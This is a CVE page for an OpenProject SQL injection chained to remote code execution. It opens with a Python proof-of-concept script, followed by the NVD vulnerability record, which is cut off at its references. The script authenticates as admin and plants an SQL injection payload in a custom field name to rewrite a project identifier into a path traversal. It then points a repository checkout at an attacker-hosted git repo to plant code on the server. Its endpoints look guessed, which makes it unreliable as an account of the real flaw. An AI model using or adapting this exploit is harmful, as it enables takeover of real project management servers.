CVE-2026-32698

# CVE-2026-32698 PoC - OpenProject SQL Injection leading to RCE # Note: Requires administrator privileges to create custom fields import requests import json TARGET_URL = "https://vulnerable-openproject.example.com" LOGIN_URL = f"{TARGET_URL}/auth/login" API_URL = f"{TARGET_URL}/api/v3" # Step 1: Authenticate as administrator session = requests.Session() login_data = { "username": "admin", "password": "admin_password" } session.post(LOGIN_URL, data=login_data) # Step 2: Create malicious custom field with SQL injection payload custom_field_data = { "name": "'; UPDATE projects SET identifier='../../etc/cron.d/pwned' WHERE id=1; --", "type": "string", "customized_type": "Project" } response = session.post(f"{API_URL}/custom_fields", json=custom_field_data) print(f"Custom field creation response: {response.status_code}") # Step 3: Trigger Cost Report to execute the SQL injection cost_report_data = { "columns": ["custom_field_1"], "group_by": "project" } response = session.post(f"{API_URL}/cost_reports", json=cost_report_data) print(f"Cost report execution response: {response.status_code}") # Step 4: Create a git repository with malicious Ruby code malicious_repo_url = "https://attacker-server/malicious-repo.git" repo_config = { "project_id": "../../etc/cron.d/pwned", "repository_url": malicious_repo_url, "scm_type": "git" } response = session.post(f"{API_URL}/repositories", json=repo_config) print(f"Repository checkout response: {response.status_code}")

{"cve": {"id": "CVE-2026-32698", "sourceIdentifier": "[email protected]", "published": "2026-03-18T22:16:24.223", "lastModified": "2026-03-19T18:32:37.460", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenProject is an open-source, web-based project management software. Versions prior to 16.6.9, 17.0.6, 17.1.3, and 17.2.1 are vulnerable to an SQL injection attack via a custom field's name. When that custom field was used in a Cost Report, the custom field's name was injected into the SQL query without proper sanitation. This allowed an attacker to execute arbitrary SQL commands during the generation of a Cost Report. As custom fields can only be generated by users with full administrator privileges, the attack surface is somewhat reduced. Together with another bug in the Repositories_module, that used the project identifier without sanitation to generate the checkout path for a git repository in the filesystem, this allowed an attacker to checkout a git repository to an arbitrarily chosen path on the server. If the checkout is done within certain paths within the OpenProject application, upon the next restart of the application, this allows the attacker to inject ruby code into the application. As the project identifier cannot be manually edited to any string containing special characters like dots or slashes, this needs to be changed via the SQL injection described above. Versions 16.6.9, 17.0.6, 17.1.3, and 17.2.1 fix the issue."}, {"lang": "es", "value": "OpenProject es un software de gestión de proyectos de código abierto, basado en la web. Las versiones anteriores a 16.6.9, 17.0.6, 17.1.3 y 17.2.1 son vulnerables a un ataque de inyección SQL a través del nombre de un campo personalizado. Cuando ese campo personalizado se utilizaba en un Informe de Costos, el nombre del campo personalizado se inyectaba en la consulta SQL sin la sanitización adecuada. Esto permitía a un atacante ejecutar comandos SQL arbitrarios durante la generación de un Informe de Costos. Dado que los campos personalizados solo pueden ser generados por usuarios con privilegios de administrador completos, la superficie de ataque se reduce un poco. Junto con otro error en el módulo Repositories, que utilizaba el identificador del proyecto sin sanitización para generar la ruta de extracción para un repositorio git en el sistema de archivos, esto permitía a un atacante extraer un repositorio git a una ruta elegida arbitrariamente en el servidor. Si la extracción se realiza dentro de ciertas rutas dentro de la aplicación OpenProject, tras el siguiente reinicio de la aplicación, esto permite al atacante inyectar código ruby en la aplicación. Dado que el identificador del proyecto no puede ser editado manualmente a ninguna cadena que contenga caracteres especiales como puntos o barras, esto necesita ser cambiado a través de la inyección SQL descrita anteriormente. Las versiones 16.6.9, 17.0.6, 17.1.3 y 17.2.1 corrigen el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.3, "impactScore": 6.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openproject:openproject:*:*:*:*:*:*:*:*", "versionEndExcluding": "16.6.9", "matchCriteriaId": "7FD9C4C4-FFDC-4EE6-AAB2-901C1C6CB6BE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:openproject:openproject:*:*:*:*:*:*:*:*", "versionStartIncluding": "17.0.0", "versionEndExcluding": "17.0.6", "matchCriteriaId": "E1003FD4-BC22-4AB4-91B4-EB63FFF41C2A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:openproject:openproject:*:*:*:*:*:*:*:*", "versionStartIncluding": "17.1.0", "versionEndExcluding": "17.1.3", "matchCriteriaId": "86B90D5D-1A3D-4524-A3CC-F7B7274A4E26"}, {"vulnerable": true, "criteria": "cpe:2.3:a:openproject:openproject:17.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "C2D1F069-BA78-4F8A-8FF9-DAE63BFB39CF"}]}]}], "references": [{"url": "https://github.com/opf/openpr ... (truncated)